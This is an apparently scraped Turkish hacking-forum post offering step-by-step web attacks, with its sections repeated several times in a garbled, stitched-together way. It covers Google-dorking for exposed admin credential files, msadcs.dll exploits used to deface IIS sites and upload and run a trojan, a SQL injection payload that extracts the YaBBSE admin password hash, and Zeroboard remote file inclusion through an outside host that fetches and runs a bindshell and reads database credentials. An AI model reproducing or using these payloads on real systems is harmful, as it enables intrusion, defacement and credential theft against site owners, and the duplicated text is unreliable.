WEB HACLEME İLE İLGİLİ ÖNEMLİ BİR DÖKÜMAN-YAZDIM
ÖNCELİKLER EMEĞE SAYGI ARKADAŞLAR
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
google dan fullxml diye aratin
daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza
CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.
3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.
Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve
cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm
buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar
II.yol
Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek
"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"
Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...
4- )
yabbse forumları nasıl hacklenir diye soranlara;
bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.
1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2
5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.
EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.
NOT:eğer bir sorunu olan varsa forumda cevaplarım
5- ) ZEROBOARD AÇIĞI
GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI
ilk önce
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.
allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
ve ............ ekrana bilgiler dökülüyor
2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)
daha sonra sayafaya imzamızı atıyoruz....
oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html
eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php
localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
bu adreslerde de işe yarıyor
google dan fullxml diye aratin
daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza
CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.
3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.
Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
Only registred user can see link on this forum!
Registred or Login on forum!
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve
cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm
buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar
II.yol
Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek
"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"
Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...
4- )
yabbse forumları nasıl hacklenir diye soranlara;
bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.
1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2
5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz;
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.
EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.
NOT:eğer bir sorunu olan varsa forumda cevaplarım
5- ) ZEROBOARD AÇIĞI
GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI
ilk önce
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.
allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
ve ............ ekrana bilgiler dökülüyor
Linux
2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)
daha sonra sayafaya imzamızı atıyoruz....
oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html
eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php
localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
bu adreslerde de işe yarıyor
2- )
google dan fullxml diye aratin
daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza
CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.
3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.
Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve
cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm
buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar
II.yol
Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek
"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"
Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...
4- )
yabbse forumları nasıl hacklenir diye soranlara;
bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.
1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2
5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz;
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.
EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.
NOT:eğer bir sorunu olan varsa forumda cevaplarım
5- ) ZEROBOARD AÇIĞI
GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI
de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.
allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
ve ............ ekrana bilgiler dökülüyor
2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)
daha sonra sayafaya imzamızı atıyoruz....
oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html
eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php
localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz....1- )
sitenin sonuna su kodu ekliyorsunuz
Kod:
/cgi-bin/emailme
ve size sitenin hangi maile kayitli oldunu buluyor fakat bu sadece mail bulmada ise yarar maili kırıp şifreyi bulmak size kalmış bir sey kolay gele.
örnek :
bu adreslerde de işe yarıyor
2- )
google dan fullxml diye aratin
daha sonra buldugunuz sitelerin ilk / isaretine kadarolan yeri silin ve db/member.xml ekleyin karsiniza
CDATA {1}
username {falan}
password{falan}
CDATA {2} diye bir ekran ciktiginda CDATA1 ile CDATA2 arasindaki kullanici admindir dahasonra geri donup ogrendiginiz kullanici adini ve sifresini yazin ve admin panelindesiniz, daha sonra istediginizi yapin.
orn:
burada sadece vesaire olan yeri silip db/member.xml yazisini ekleyin... kolay gelsin.
3- )
Bu yazıda msadcs.dll açığından nasıl faydalanabileceği ve nasıl patchleneceğini
anlatacağım.Burada cgi-scanner olarak Whisker'i kullandım siz isterseniz başka bir
tarayıcıda kullanabilirsiniz.Benim bildiğim iki yol var.Birincisi herkesin bildiği
dostan erişim.İkincisi karşı bilgisayara trojan yüklemek. Ben ikisinide anlattım
artık gerisi size kalmış.
Araclar
------------ Whisker =>>http://www.wiretrip.net/rfp)
Msadcs2.pl =>>http://www.wiretrip.net/rfp)
Msadc-Trojan.pl =>>http://packetstormsecurity.nl/0001-...msadc-trojan.pl)
------------
I.yol
Whisker.pl exploitini c: perlbin klasörüne atiyoruz ve dos'a geçip sunlari
yaziyoruz..
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl whisker.pl -h
yaziyoruz ve sansliysak asagidaki
sonuçlari veriyor...
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
tamam sistemde msadcs.dll açigi var demektir.
Hemen msadc2.pl exploitini aliyoruz ve c:PerlBin> dizinine atiyoruz.Daha sonra
dos'a geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc2.pl -h
yaziyoruz.
Sonra bir bakiyoruz...
Hostname:kurban.com
Server:IIS X.X
Sonra karsiniza cmd c gibi bir sey çikar.Bu sisteme root oldugumuzu
anliyoruz.Siteyi hacked etmek için sitenin pathini bilmemiz gerekiyor. Bunun için
Path Saptama Teknikleri adlı yazımdan faydalanabilirsiniz.Neyse diyelim ki pathi
c:Inetpubwwwroot.Daha sonra ana sayfayı bulmamız gerekiyor.Bunuda biraz
kurcala***** bulursunuz.Deneyin index.htm,default.asp,.. Ben default.asp'nin
tuttuğunu varsayıyorum ve
cmd cecho Hacked By 133t> c:Inetpubwwwrootindex.htm
buradan sonra Success mesajini bekliyoruz.Daha sonra explorer'a geçip
yaziyoruz bir bakiyoruz Hacked by 133t..
Hepinize basarilar
II.yol
Evet burada msadc-trojan.pl kullanmayi ögrenecegiz...Ilk önce biraz bilgi verelim bu
exploit hakkinda.Bu exploit msadcs.dll açigindan faydalanarak sisteme trojan
yolluyor ve trojani sistemde çalistiriyor..Tabi bu exploitin çalismasi için sistemde
msadcs.dll açiginin sistemde olmasi gerekiyor.Diyelim ki bir siteyi whisker ile
taradiniz ve asagidaki sonuçlari verdi:
+200 GET /scripts/tools/newdsn.exe
+200 HEAD /msadc/msadcs.dll
msadc-trojan.pl exploitimizi aliyoruz ve c: perlbin klasörüne atiyoruz...Ondan
sonra kullanacagimiz trojanida c: perlbin klasörüne atiyoruz, daha sonra dos'a
geçip
c: Windows>cd..
c: cd perl
c: perl>cd bin
c: PerlBin>perl msadc-trojan.pl
localip trojan.exe yaziyoruz.
Daha sonra söyle bir mesaj verecek
"done. uploaded and ran If all went well, you should be able to use the trojan to
connect"
Artik gerisi size kalmis.Trojaniniz kullanarak istediginizi yapin...
4- )
yabbse forumları nasıl hacklenir diye soranlara;
bizim işimize gerekecek olan tek şey bir tane işe yarar md5 şifre kırıcı.
1- foruma register ol.
2- herhangi bir topici sec
3- herhangi bir mesaji sec
4- internet explorer, view den "kaynak"ı sec. bul de
sesc diye arattir ve yanindaki 32 basamakli session id yi al.
ornegin:13a478d8aa161c2231e6d3b36b6d19f2
5- urln normalde buna benzer bisey ya;
6- onu su sekilde yaz;
e=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ul l,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
oradaki secs senin biraz once buldugun secs..
ID>MEMBER=1 dedigi de 1. user ,yani admin. iste bu sana admin passwordunun hashlanmis halini verecek.
EĞER YABBSE İLE YAPILAN SİTE BULAMADIYSANIZ ÜZÜLMEYİN,BU YOKLUKTA GOOGLE İMDADIMIZA HEMEN YETİŞİYOR:google yi açın arama kısmına yabbse/index.php yazarak bir çok sayfaya ulaşın.Kolay gelsin.
NOT:eğer bir sorunu olan varsa forumda cevaplarım
5- ) ZEROBOARD AÇIĞI
GEREKLİ ARACLAR : - matrix.txt (remote file inclusion)
- explorer (vede biraz sabır)
AÇIĞIN BULUNMASI
ilk önce de veya "findsite.exe" gibi araçlarla bu açığı aratırıyoruz.
allinurl: /zboard/zboard.php
daha sonra buldugumuz bir siteyi explorer'a copy yapıyoruz. Örnek:
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
ve ............ ekrana bilgiler dökülüyor
2.6.9-1.11_FC2 #1 Sun Jan 2 15:49:30 EST 2005 i686
i686 i386 GNU/Linux
/home/juotte/www/bbs/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)
daha sonra sayafaya imzamızı atıyoruz....
oda bu şekilde :
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;echo zeronc was Here >index.html
eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php
localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
goruldugu gibi user ve password karşımızda
daha sonra FTP den user ve pass ile baglanabiliriz.
genelde aynı oluyor. ama tabi tutmayabilir.......
Yoksa mysqlden bağlanıyoruz..../Link